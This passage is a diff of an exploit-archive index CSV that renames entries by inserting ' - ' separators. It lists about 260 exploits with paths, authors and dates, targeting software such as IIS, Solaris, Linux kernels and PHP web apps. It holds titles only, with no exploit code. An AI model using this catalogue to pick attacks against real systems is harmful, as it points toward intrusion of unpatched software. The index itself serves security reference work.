id,file,description,date,author,platform,type,port 19753,platforms/windows/remote/19753.txt,"Microsoft frontpage personal webserver 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf",2000-02-18,"Eric Stevens",windows,local,0 19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 -19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu",2000-02-19,anonymous,freebsd,local,0 +19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 Licensing Manager Symlink",2000-02-21,sp00n,solaris,local,0 19758,platforms/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 - Command Injection",2012-07-12,Metasploit,php,webapps,0 19759,platforms/windows/dos/19759.c,"Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence DoS",2000-01-18,"Kit Knox",windows,dos,0 19760,platforms/windows/dos/19760.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Terminal Configuration",2000-02-24,"Ussr Labs",windows,dos,0 19761,platforms/windows/remote/19761.txt,"Sambar Server 4.2 beta 7 - Batch CGI",2000-02-24,"Georich Chorbadzhiyski",windows,remote,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 -19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 +19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,linux,local,0 -19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 setxconf",2000-02-24,suid,linux,local,0 +19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - setxconf",2000-02-24,suid,linux,local,0 19766,platforms/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin - Denial of Service",2000-02-25,"Christophe GRENIER",hardware,dos,0 19768,platforms/php/webapps/19768.txt,"House Style 0.1.2 - readfile() Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0 19769,platforms/php/webapps/19769.txt,"eCan 0.1 - Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0 @@ -17142,10 +17138,10 @@ id,file,description,date,author,platform,type,port 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - DoS",2000-02-26,"Jeff Stevens",multiple,dos,0 19781,platforms/multiple/remote/19781.sh,"Alex Heiphetz Group EZShopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote,0 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - DoS",2000-02-28,"Jon Hittner",windows,dos,0 -19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 GET Request",1999-08-25,"ISS X-Force",windows,dos,0 -19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD Authentication",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 +19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0 +19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD - Bypass Authentication",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0 -19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 Input Validation",2000-03-02,"Jonathan Leto",cgi,remote,0 +19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 - Input Validation",2000-03-02,"Jonathan Leto",cgi,remote,0 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - DoSemu Distribution Configuration",2000-03-02,suid,linux,local,0 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 @@ -17153,12 +17149,12 @@ id,file,description,date,author,platform,type,port 19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 Plugin - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser - Remote File & Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0 -19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer",2000-03-05,"Keyser Soze",linux,local,0 +19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,cgi,remote,0 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",multiple,local,0 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read",2000-03-09,"Vanja Hrustic",unix,remote,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,windows,local,0 -19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 +19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - DoS",2000-03-04,anonymous,windows,dos,0 19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0 / Cisco PIX Firewall 4.x/5.x - 'ALG' Client",2000-03-10,"Dug Song",multiple,remote,0 19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Buffer Overflow",2000-03-10,bladi,linux,remote,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (1)",2000-03-11,Krahmer,linux,local,0 @@ -17176,7 +17172,7 @@ id,file,description,date,author,platform,type,port 19814,platforms/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 - Directory Indexing",2000-03-17,"Gabriel Maggiotti",multiple,remote,0 19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal",2000-03-21,"Johan Nilsson",windows,remote,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local,0 -19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 +19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0 19819,platforms/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read",2000-03-27,"Quan Peng",windows,remote,0 19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - DoS",2000-03-25,"Presto Chango",windows,dos,0 @@ -17195,12 +17191,12 @@ id,file,description,date,author,platform,type,port 19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - DoS",2000-03-31,"Todd Beebe",windows,dos,0 -19836,platforms/windows/local/19836.c,"Symantec pcAnywhere 9.0 Weak Encryption",2000-04-06,"Pascal Longpre",windows,local,0 -19837,platforms/linux/local/19837.c,"Bray Systems Linux Trustees 1.5 Long Pathname",2000-04-10,"Andrey E. Lerman",linux,local,0 +19836,platforms/windows/local/19836.c,"Symantec pcAnywhere 9.0 - Weak Encryption",2000-04-06,"Pascal Longpre",windows,local,0 +19837,platforms/linux/local/19837.c,"Bray Systems Linux Trustees 1.5 - Long Pathname",2000-04-10,"Andrey E. Lerman",linux,local,0 19838,platforms/linux/local/19838.c,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (1)",2000-04-10,kingpin,linux,local,0 19839,platforms/windows/local/19839.txt,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (2)",2000-04-10,kingpin,windows,local,0 19840,platforms/beos/local/19840.txt,"Be BeOS 4.5/5.0 - Invalid System Call",2000-04-10,"Konstantin Boldyshev",beos,local,0 -19841,platforms/beos/local/19841.casl,"Be BeOS 4.0/4.5/5.0 IP Packet Length Field",2000-04-07,"Tim Newsham",beos,local,0 +19841,platforms/beos/local/19841.casl,"Be BeOS 4.0/4.5/5.0 - IP Packet Length Field Exploit",2000-04-07,"Tim Newsham",beos,local,0 19842,platforms/cgi/remote/19842.txt,"TalentSoft Web+ 4.x - Directory Traversal",2000-04-12,"John P. McNeely",cgi,remote,0 19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote DoS",2000-04-12,eAX,windows,dos,0 19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 - bizdb-search.cgi Remote Command Execution",2000-04-13,"PErfecto Technology",cgi,remote,0 @@ -17219,10 +17215,10 @@ id,file,description,date,author,platform,type,port 19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,Metasploit,windows,remote,888 19905,platforms/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 - File Access",2000-05-13,no_maam,unix,remote,0 19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 Undocumented Password",2000-05-08,"Stake Inc",unix,local,0 -19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 -19960,platforms/windows/dos/19960.txt,"Oracle Outside-In FPX File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 +19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 +19960,platforms/windows/dos/19960.txt,"Oracle Outside-In - .FPX File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19862,platforms/php/webapps/19862.pl,"WordPress Diary/Notebook Site5 Theme - Email Spoofing",2012-07-16,bwall,php,webapps,0 -19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 +19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19866,platforms/windows/dos/19866.pl,"DomsHttpd 1.0 - Remote Denial of Service",2012-07-16,"Jean Pascal Pereira",windows,dos,0 @@ -17239,12 +17235,12 @@ id,file,description,date,author,platform,type,port 19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 - lp -d Option Buffer Overflow",2000-04-24,DiGiT,solaris,local,0 19879,platforms/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package Default Account and Password",2000-04-24,"Max Vision",linux,remote,0 -19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 Port Scan DoS",2000-04-25,Vacuum,windows,dos,0 +19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 - Port Scan DoS",2000-04-25,Vacuum,windows,dos,0 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password",2000-04-27,"Cerberus Security Team",windows,remote,0 19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %%",2000-04-26,"Keith Woodworth",hardware,remote,0 19883,platforms/linux/local/19883.c,"S.u.S.E. Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0 19884,platforms/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow",2000-05-01,"Ussr Labs",windows,dos,0 -19885,platforms/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 Warning Message Circumvention",2000-04-28,"Bennett Haselton",windows,dos,0 +19885,platforms/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 - Warning Message Circumvention",2000-04-28,"Bennett Haselton",windows,dos,0 19886,platforms/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote,0 19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0 @@ -17252,14 +17248,14 @@ id,file,description,date,author,platform,type,port 19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (1)",1999-05-31,"Hugo Breton",linux,remote,0 19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (2)",1999-05-31,scut,linux,remote,0 19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow",2000-05-01,"David Litchfield",windows,remote,0 -19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 eToken PIN Extraction",2000-05-04,kingpin,windows,local,0 +19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 - eToken PIN Extraction",2000-05-04,kingpin,windows,local,0 19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server Buffer Overflow",2000-03-01,Joey__,windows,remote,0 19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0 19897,platforms/windows/remote/19897.txt,"FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 - DoS",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console",2000-05-03,"Michal Zalewski",linux,local,0 -19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2",2000-05-16,"Stephen Friedl",hardware,remote,0 +19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 - Exploit",2000-05-16,"Stephen Friedl",hardware,remote,0 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) XSS",2012-07-21,muts,php,webapps,0 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",multiple,remote,0 19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 - Malformed File Extension DoS",2000-05-11,"Ussr Labs",windows,dos,0 @@ -17268,7 +17264,7 @@ id,file,description,date,author,platform,type,port 19910,platforms/solaris/local/19910.c,"Solaris 2.6/7.0/8 netpr - Buffer Overflow (1)",1999-05-23,ADM,solaris,local,0 19911,platforms/solaris/local/19911.c,"Solaris 2.6/7.0/8 netpr - Buffer Overflow (2)",1999-03-04,ADM,solaris,local,0 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink",2000-05-10,foo,multiple,local,0 -19913,platforms/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 Input Validation",2000-05-15,"Howard M. Kash III",cgi,remote,0 +19913,platforms/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 - Input Validation",2000-05-15,"Howard M. Kash III",cgi,remote,0 19914,platforms/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 - Email Account Access",2000-05-15,"Pierre Benoit",windows,remote,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0 19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (1)",2000-05-16,"Hugo Breton",multiple,remote,0 @@ -17291,19 +17287,19 @@ id,file,description,date,author,platform,type,port 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,Metasploit,windows,remote,998 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 -19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS",2000-05-18,visi0n,beos,dos,0 +19938,platforms/beos/dos/19938.txt,"BeOS 5.0 - TCP Fragmentation Remote DoS",2000-05-18,visi0n,beos,dos,0 19939,platforms/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access",2000-05-17,"Andrew Nosenko",windows,remote,0 19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 - Malformed IP Packets DoS (1)",2000-05-18,"rain forest puppy",windows,dos,0 19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 - Malformed IP Packets DoS (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 19942,platforms/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,windows,remote,0 -19943,platforms/hardware/remote/19943.txt,"Intel Corporation Express 8100 ISDN Router Fragmented ICMP",1990-05-19,"Dimuthu Parussalla",hardware,remote,0 +19943,platforms/hardware/remote/19943.txt,"Intel Corporation Express 8100 ISDN Router - Fragmented ICMP",1990-05-19,"Dimuthu Parussalla",hardware,remote,0 19944,platforms/multiple/remote/19944.pl,"Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3 / Mail Server 5.0.1/5.0.2/5.0.3 - Buffer Overflow",2000-05-18,smiler,multiple,remote,0 19945,platforms/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,multiple,remote,0 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - /usr/tmp/ Symlink",2000-04-21,anonymous,linux,local,0 19947,platforms/linux/remote/19947.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (1)",2000-05-22,"Chris Evans",linux,remote,0 19948,platforms/linux/remote/19948.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (2)",2000-05-22,AbraxaS,linux,remote,0 19949,platforms/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0 / WebShield E-ppliance 100.0/300.0 / IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote,0 -19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service",2000-05-18,"Chris Evans",linux,dos,0 +19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",linux,dos,0 19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0 / Cart32 2.5 a/3.0 / Shop Express 1.0 / StoreCreator 3.0 Web Shopping Cart - Hidden Form Field",2000-02-01,CDI,cgi,remote,0 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 @@ -17313,9 +17309,9 @@ id,file,description,date,author,platform,type,port 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 - File Duplication and Source Disclosure",2000-05-24,"Cerberus Security Team",windows,remote,0 19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",2012-07-20,Metasploit,windows,remote,0 19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",2012-07-20,Metasploit,windows,remote,998 -19961,platforms/windows/dos/19961.txt,"Oracle Outside-In LWP File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 +19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - .LWP File Parsing Stack-Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 -19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 +19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Windows 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow",2000-05-29,noir,linux,local,0 19970,platforms/linux/local/19970.c,"KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 @@ -17323,10 +17319,10 @@ id,file,description,date,author,platform,type,port 19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - (ELM) Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0 19973,platforms/windows/remote/19973.txt,"Fastraq Mailtraq 1.1.4 - Multiple Path Vulnerabilities",2000-03-22,Slash,windows,remote,0 19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - DoS",2000-05-31,"Kit Knox",windows,dos,0 -19975,platforms/windows/remote/19975.pl,"Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access",2000-05-31,"H D Moore",windows,remote,0 +19975,platforms/windows/remote/19975.pl,"Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access",2000-05-31,"H D Moore",windows,remote,0 19976,platforms/windows/remote/19976.txt,"Concatus IMate Web Mail Server 2.5 - Buffer Overflow",2000-06-01,"Delphis Consulting",windows,remote,0 19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - View-Source DoS",2000-06-01,"Ussr Labs",multiple,dos,0 -19978,platforms/linux/remote/19978.pl,"Atrus Trivalie Productions Simple Network Time Sync 1.0 daemon Buffer Overflow",2000-06-01,"Ben Taylor",linux,remote,0 +19978,platforms/linux/remote/19978.pl,"Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow",2000-06-01,"Ben Taylor",linux,remote,0 19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile (1)",2000-05-31,kil3r,linux,local,0 19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile (2)",2000-05-31,kil3r,linux,local,0 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile (3)",2000-05-31,IhaQueR,linux,local,0 @@ -17337,7 +17333,7 @@ id,file,description,date,author,platform,type,port 19986,platforms/windows/dos/19986.txt,"Oxide Webserver 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos,0 19987,platforms/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 -19989,platforms/windows/local/19989.c,"PassWD 1.2 Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 +19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man /tmp symlink",2000-06-02,"Jason Axley",hp-ux,local,0 19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 @@ -17345,9 +17341,9 @@ id,file,description,date,author,platform,type,port 19994,platforms/windows/dos/19994.c,"Check Point Software Firewall-1 4.0/1 4.1 - Fragmented Packets DoS",2000-05-23,phonix,windows,dos,0 19995,platforms/cgi/remote/19995.txt,"Michael Lamont Savant WebServer 2.1 - CGI Source Code Disclosure",2000-06-05,Drew,cgi,remote,0 19996,platforms/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x - Administrator Login Password DoS",2000-06-07,"Stuart McClure",multiple,dos,0 -19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 Logging Buffer Overflow",2000-05-10,Wizdumb,windows,remote,0 +19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 - Logging Buffer Overflow",2000-05-10,Wizdumb,windows,remote,0 19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow",2000-06-12,"Michal Zalewski",linux,remote,0 -19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 +19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' (1)",2000-06-07,"Florian Heinz",linux,local,0 20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 @@ -17361,7 +17357,7 @@ id,file,description,date,author,platform,type,port 20011,platforms/windows/webapps/20011.js,"solarwinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,windows,local,0 20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow",2000-06-01,Syzop,linux,local,0 -20014,platforms/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore Buffer Overflow",2000-06-14,"Job de Haas of ITSX",solaris,local,0 +20014,platforms/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore - Buffer Overflow",2000-06-14,"Job de Haas of ITSX",solaris,local,0 20015,platforms/windows/dos/20015.txt,"AnalogX 